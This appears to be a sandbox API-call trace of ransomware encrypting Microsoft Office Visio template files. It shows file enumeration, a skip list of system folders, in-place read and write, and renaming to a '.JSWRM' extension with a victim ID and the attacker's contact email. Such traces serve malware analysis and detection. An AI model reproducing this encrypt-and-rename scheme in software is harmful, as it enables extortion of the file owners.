FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x493a87e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x493a87e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x493a87e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x16881, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_GANTTCHART_M.VSTX", cAlternateFileName="BASIC_~3.VST")) returned 1 [0144.572] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2=".") returned 1 [0144.572] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2="..") returned 1 [0144.572] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2="...") returned 1 [0144.572] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2="windows") returned -1 [0144.572] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2="recovery") returned -1 [0144.572] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2="perflogs") returned -1 [0144.572] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2="documents and settings") returned -1 [0144.572] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.572] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2="system volume information") returned -1 [0144.573] lstrcmpiW (lpString1="BASIC_GANTTCHART_M.VSTX", lpString2="msocache") returned -1 [0144.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_GANTTCHART_M.VSTX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_GANTTCHART_M.VSTX", cchWideChar=23, lpMultiByteStr=0x241358, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_GANTTCHART_M.VSTX", lpUsedDefaultChar=0x0) returned 23 [0144.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_GANTTCHART_M.VSTX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_GANTTCHART_M.VSTX", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_GANTTCHART_M.VSTX", lpUsedDefaultChar=0x0) returned 23 [0144.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_GANTTCHART_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_ganttchart_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.574] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=92289) returned 1 [0144.574] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.574] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x16880, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x16880, lpOverlapped=0x0) returned 1 [0144.581] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.582] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x16880, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x16880, lpOverlapped=0x0) returned 1 [0144.582] CloseHandle (hObject=0x314) returned 1 [0144.583] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_GANTTCHART_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_ganttchart_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_GANTTCHART_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_ganttchart_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.584] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x493a87e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x493a87e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x493a87e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17ead, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_GANTTCHART_U.VSTX", cAlternateFileName="BASIC_~4.VST")) returned 1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2=".") returned 1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2="..") returned 1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2="...") returned 1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2="windows") returned -1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2="recovery") returned -1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2="perflogs") returned -1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2="documents and settings") returned -1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2="system volume information") returned -1 [0144.584] lstrcmpiW (lpString1="BASIC_GANTTCHART_U.VSTX", lpString2="msocache") returned -1 [0144.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_GANTTCHART_U.VSTX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_GANTTCHART_U.VSTX", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_GANTTCHART_U.VSTX", lpUsedDefaultChar=0x0) returned 23 [0144.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_GANTTCHART_U.VSTX", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0144.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_GANTTCHART_U.VSTX", cchWideChar=23, lpMultiByteStr=0x240ef8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_GANTTCHART_U.VSTX", lpUsedDefaultChar=0x0) returned 23 [0144.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_GANTTCHART_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_ganttchart_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.585] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=97965) returned 1 [0144.585] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.586] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x17ea0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x17ea0, lpOverlapped=0x0) returned 1 [0144.594] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.594] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x17ea0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x17ea0, lpOverlapped=0x0) returned 1 [0144.595] CloseHandle (hObject=0x314) returned 1 [0144.595] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_GANTTCHART_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_ganttchart_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_GANTTCHART_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_ganttchart_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.596] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x493a87e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x493a87e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x493a87e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x163aa, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_HOME_NETWORK_M.VSTX", cAlternateFileName="BA79E9~1.VST")) returned 1 [0144.596] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2=".") returned 1 [0144.596] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2="..") returned 1 [0144.596] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2="...") returned 1 [0144.596] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2="windows") returned -1 [0144.597] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2="recovery") returned -1 [0144.597] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2="perflogs") returned -1 [0144.597] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2="documents and settings") returned -1 [0144.597] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.597] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2="system volume information") returned -1 [0144.597] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_M.VSTX", lpString2="msocache") returned -1 [0144.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_HOME_NETWORK_M.VSTX", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0144.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_HOME_NETWORK_M.VSTX", cchWideChar=25, lpMultiByteStr=0x240ef8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_HOME_NETWORK_M.VSTX", lpUsedDefaultChar=0x0) returned 25 [0144.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_HOME_NETWORK_M.VSTX", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0144.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_HOME_NETWORK_M.VSTX", cchWideChar=25, lpMultiByteStr=0x241100, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_HOME_NETWORK_M.VSTX", lpUsedDefaultChar=0x0) returned 25 [0144.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.597] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_HOME_NETWORK_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_home_network_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.598] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=91050) returned 1 [0144.598] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.598] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x163a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x163a0, lpOverlapped=0x0) returned 1 [0144.606] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.606] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x163a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x163a0, lpOverlapped=0x0) returned 1 [0144.607] CloseHandle (hObject=0x314) returned 1 [0144.607] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_HOME_NETWORK_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_home_network_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_HOME_NETWORK_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_home_network_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.608] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x493a87e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x493a87e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x493a87e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15b47, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_HOME_NETWORK_U.VSTX", cAlternateFileName="BA3A7A~1.VST")) returned 1 [0144.608] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2=".") returned 1 [0144.608] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2="..") returned 1 [0144.608] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2="...") returned 1 [0144.608] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2="windows") returned -1 [0144.608] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2="recovery") returned -1 [0144.609] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2="perflogs") returned -1 [0144.609] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2="documents and settings") returned -1 [0144.609] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.609] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2="system volume information") returned -1 [0144.609] lstrcmpiW (lpString1="BASIC_HOME_NETWORK_U.VSTX", lpString2="msocache") returned -1 [0144.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_HOME_NETWORK_U.VSTX", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0144.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_HOME_NETWORK_U.VSTX", cchWideChar=25, lpMultiByteStr=0x240fc0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_HOME_NETWORK_U.VSTX", lpUsedDefaultChar=0x0) returned 25 [0144.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_HOME_NETWORK_U.VSTX", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0144.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_HOME_NETWORK_U.VSTX", cchWideChar=25, lpMultiByteStr=0x240ef8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_HOME_NETWORK_U.VSTX", lpUsedDefaultChar=0x0) returned 25 [0144.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_HOME_NETWORK_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_home_network_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.610] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=88903) returned 1 [0144.610] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.610] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x15b40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x15b40, lpOverlapped=0x0) returned 1 [0144.623] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.623] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x15b40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x15b40, lpOverlapped=0x0) returned 1 [0144.624] CloseHandle (hObject=0x314) returned 1 [0144.624] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_HOME_NETWORK_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_home_network_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_HOME_NETWORK_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_home_network_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.625] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2a15d5c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x2a15d5c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x2a15d5c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1b1d8, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BASIC_M.VSSX", cAlternateFileName="BASIC_~2.VSS")) returned 1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2=".") returned 1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2="..") returned 1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2="...") returned 1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2="windows") returned -1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2="recovery") returned -1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2="perflogs") returned -1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2="documents and settings") returned -1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2="system volume information") returned -1 [0144.626] lstrcmpiW (lpString1="BASIC_M.VSSX", lpString2="msocache") returned -1 [0144.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0144.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0144.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.627] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=111064) returned 1 [0144.628] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.628] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1b1d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1b1d0, lpOverlapped=0x0) returned 1 [0144.637] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.637] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1b1d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1b1d0, lpOverlapped=0x0) returned 1 [0144.638] CloseHandle (hObject=0x314) returned 1 [0144.638] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BASIC_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\basic_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 